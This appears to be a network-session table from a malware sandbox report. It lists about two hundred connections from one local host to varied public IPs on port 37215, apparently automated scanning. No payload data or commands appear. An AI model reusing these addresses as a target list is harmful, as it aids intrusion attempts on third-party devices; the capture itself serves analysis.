                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14803192.168.2.1335504157.140.60.23637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14804192.168.2.133998027.105.19.18937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14805192.168.2.1355286197.154.32.19637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14806192.168.2.1345316187.176.13.22837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14807192.168.2.1358690157.188.3.5537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14808192.168.2.133387641.244.115.4837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14809192.168.2.135247290.72.211.23237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14810192.168.2.1357312197.86.33.10337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14811192.168.2.135917841.177.143.18537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14812192.168.2.1358286184.150.164.24237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14813192.168.2.133367494.153.141.24037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14814192.168.2.134726841.108.186.18437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14815192.168.2.134369619.62.190.8637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14816192.168.2.135307641.148.4.1337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14817192.168.2.1356712157.70.224.18537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14818192.168.2.1346254106.92.204.1537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14819192.168.2.135119041.78.16.8237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14820192.168.2.1341264157.124.143.6737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14821192.168.2.1341212123.191.255.2637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14822192.168.2.1360580157.20.109.14737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14823192.168.2.134988441.60.42.14537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14824192.168.2.1335842197.108.242.22137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14825192.168.2.134243045.244.238.24837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14826192.168.2.134036841.18.180.18937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14827192.168.2.1353480121.89.223.6637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14828192.168.2.1359412157.239.13.14837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14829192.168.2.1344294197.153.168.19637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14830192.168.2.1340104197.186.8.10737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14831192.168.2.134549095.196.79.23437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14832192.168.2.1334116197.160.45.6437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14833192.168.2.1353810197.98.228.14737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14834192.168.2.1341402157.250.179.13037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14835192.168.2.1350390157.98.76.4137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14836192.168.2.1342416190.143.35.11437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14837192.168.2.134621441.51.189.16137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14838192.168.2.1336232187.122.57.9537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14839192.168.2.1356810197.182.182.23737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14840192.168.2.1341534206.64.103.20837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14841192.168.2.1360474197.81.102.13237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14842192.168.2.134166041.66.195.23537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14843192.168.2.1354832137.145.215.23237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14844192.168.2.1352358157.86.72.13037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14845192.168.2.134117037.52.196.2337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14846192.168.2.1336522197.3.244.15037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14847192.168.2.136099841.133.182.20437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14848192.168.2.134821070.120.190.14437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14849192.168.2.135107441.243.84.21637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14850192.168.2.134422041.169.22.12437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14851192.168.2.1359522157.50.169.14137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14852192.168.2.1337908200.254.140.4137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14853192.168.2.133310641.225.105.19237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14854192.168.2.1348626157.148.250.8637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14855192.168.2.134260441.48.62.7137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14856192.168.2.1357644166.67.152.2737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14857192.168.2.135334441.23.147.19037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14858192.168.2.1338938157.63.131.13637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14859192.168.2.134561857.79.170.19837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14860192.168.2.134880241.144.106.4737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14861192.168.2.1353874197.153.138.20037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14862192.168.2.1339998197.144.117.6537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14863192.168.2.135692641.17.66.9437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14864192.168.2.13376548.107.31.20637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14865192.168.2.1343096197.238.35.24837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14866192.168.2.135942241.197.218.13937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14867192.168.2.135877441.234.147.20837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14868192.168.2.1336386212.187.55.23237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14869192.168.2.134999641.136.210.25537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14870192.168.2.1341418197.247.180.17037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14871192.168.2.1353752157.178.83.12737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14872192.168.2.1357884197.97.250.4137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14873192.168.2.133884841.215.125.437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14874192.168.2.135170825.232.69.4237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14875192.168.2.1334382157.43.245.14737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14876192.168.2.1349410157.72.67.11437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14877192.168.2.1344626167.178.222.23237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14878192.168.2.1347668176.130.224.7337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14879192.168.2.1357626132.120.46.23937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14880192.168.2.1340908157.211.53.11337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14881192.168.2.135509641.96.109.5637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14882192.168.2.1339536221.49.96.437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14883192.168.2.135514641.220.78.11137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14884192.168.2.1358100157.33.110.14037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14885192.168.2.134571839.88.53.8837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14886192.168.2.1342202157.23.92.7237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14887192.168.2.1335074197.50.179.21737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14888192.168.2.13439181.124.97.16437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14889192.168.2.1355846197.10.24.24137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14890192.168.2.1348444170.95.202.23337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14891192.168.2.133688018.24.70.2437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14892192.168.2.133767241.9.113.15037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14893192.168.2.1359520197.34.89.17537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14894192.168.2.1341952157.203.77.23537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14895192.168.2.1341968156.243.55.5037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14896192.168.2.1352298197.208.9.6337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14897192.168.2.1339028197.76.171.4037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14898192.168.2.133904466.180.138.12337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14899192.168.2.1356806197.27.178.17737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14900192.168.2.1348438157.62.176.8537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14901192.168.2.1350304157.130.233.16237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14902192.168.2.133643241.140.250.22437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14903192.168.2.1341572186.162.90.15637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14904192.168.2.134523241.72.50.2237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14905192.168.2.1338798197.73.236.17737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14906192.168.2.134561839.57.34.1037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14907192.168.2.133630844.73.49.13737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14908192.168.2.1360634197.7.228.24737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14909192.168.2.134473698.181.219.12637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14910192.168.2.135041865.133.112.3837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14911192.168.2.133936444.52.5.6737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14912192.168.2.133960241.242.139.11537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14913192.168.2.1360016197.52.158.4137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14914192.168.2.1344318157.223.231.16437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14915192.168.2.1333654157.179.86.19837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14916192.168.2.1356898161.48.163.4537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14917192.168.2.134805252.30.148.20537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14918192.168.2.1347506157.209.220.11537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14919192.168.2.1337652197.171.4.5637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14920192.168.2.1359014174.162.221.22437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14921192.168.2.1340488197.70.234.16937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14922192.168.2.135052831.248.85.22537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14923192.168.2.1356028197.35.224.7437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14924192.168.2.1356536101.89.189.3637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14925192.168.2.1332968197.16.74.13037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14926192.168.2.1360458157.250.99.13537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14927192.168.2.1334806157.38.40.11937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14928192.168.2.1342584157.202.190.19537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14929192.168.2.1334382157.218.120.7337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14930192.168.2.1351166197.119.201.2237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14931192.168.2.133427841.240.142.12937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14932192.168.2.136052634.196.100.11437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14933192.168.2.134648841.9.206.24237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14934192.168.2.1344108197.173.15.13937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14935192.168.2.1347164107.30.142.14537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14936192.168.2.133936842.213.64.2637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14937192.168.2.1356028157.49.193.14237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14938192.168.2.1336438191.112.115.14837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14939192.168.2.134470094.210.215.9437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14940192.168.2.1347452210.216.139.8537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14941192.168.2.1343714197.53.150.24437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14942192.168.2.133999294.162.171.9837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14943192.168.2.134429441.4.67.23837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14944192.168.2.133317457.130.149.15337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14945192.168.2.13365482.38.150.14137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14946192.168.2.1333638197.106.215.17737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14947192.168.2.134498452.217.247.2137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14948192.168.2.1359716157.85.43.23237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14949192.168.2.135209841.52.189.24837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14950192.168.2.1359890197.211.35.19037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14951192.168.2.1342120197.165.65.19037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14952192.168.2.1350640121.113.103.8137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14953192.168.2.1333462197.60.75.16437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14954192.168.2.135866276.131.97.19037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14955192.168.2.134242841.53.196.3437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14956192.168.2.134161041.23.115.5837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14957192.168.2.1345072157.2.215.15437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14958192.168.2.135464041.81.50.12837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14959192.168.2.1356338136.166.51.23137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14960192.168.2.1360420197.132.99.24637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14961192.168.2.133417841.224.46.22637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14962192.168.2.1351108172.33.157.25337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14963192.168.2.1339924163.21.143.22737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14964192.168.2.1358874157.254.98.15937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14965192.168.2.1343560218.166.110.16537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14966192.168.2.1339290197.108.241.15537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14967192.168.2.133690241.110.89.4337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14968192.168.2.135012841.119.104.20337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14969192.168.2.1346946197.60.173.1237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14970192.168.2.1356786197.184.199.22237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14971192.168.2.1336722197.113.97.21637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14972192.168.2.1360406197.130.69.18737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14973192.168.2.1349408197.149.42.16937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14974192.168.2.1344080197.196.137.1837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14975192.168.2.1348578157.85.55.10337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14976192.168.2.134864441.216.3.21137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14977192.168.2.1346002180.246.90.6137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14978192.168.2.134910874.122.219.137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14979192.168.2.134091241.140.111.1437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14980192.168.2.135839057.32.120.22137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14981192.168.2.133860290.160.194.10637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14982192.168.2.135961241.116.196.15937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14983192.168.2.1344136197.128.240.12737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14984192.168.2.135105641.162.211.25137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14985192.168.2.135131248.192.19.21237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14986192.168.2.136010441.212.82.17837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14987192.168.2.1339640197.109.151.17737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14988192.168.2.133784641.134.36.10737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14989192.168.2.1356764157.251.124.14737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14990192.168.2.133888641.68.174.24237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14991192.168.2.1360044197.172.211.15737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14992192.168.2.1344492181.5.103.16337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14993192.168.2.1352522131.94.39.21537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14994192.168.2.1354942197.207.185.21837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14995192.168.2.135271079.147.47.22737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14996192.168.2.1360886157.112.228.6537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14997192.168.2.1334524157.221.145.2037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14998192.168.2.1349750157.16.13.7637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14999192.168.2.1350426157.236.118.23037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15000192.168.2.1345222197.210.243.4537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15001192.168.2.135222444.159.186.8537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15002192.168.2.1336678197.253.129.14437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15003192.168.2.1355364168.112.109.14337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15004192.168.2.1356516157.133.71.2837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15005192.168.2.1337780197.82.253.637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15006192.168.2.135630241.106.133.8537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15007192.168.2.1359866157.245.174.3137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15008192.168.2.1357840197.255.180.25437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15009192.168.2.1337360197.191.100.18637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15010192.168.2.1352300197.161.136.12437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15011192.168.2.134803641.198.170.8537215
                                                  TimestampBytes transferredDirectionData


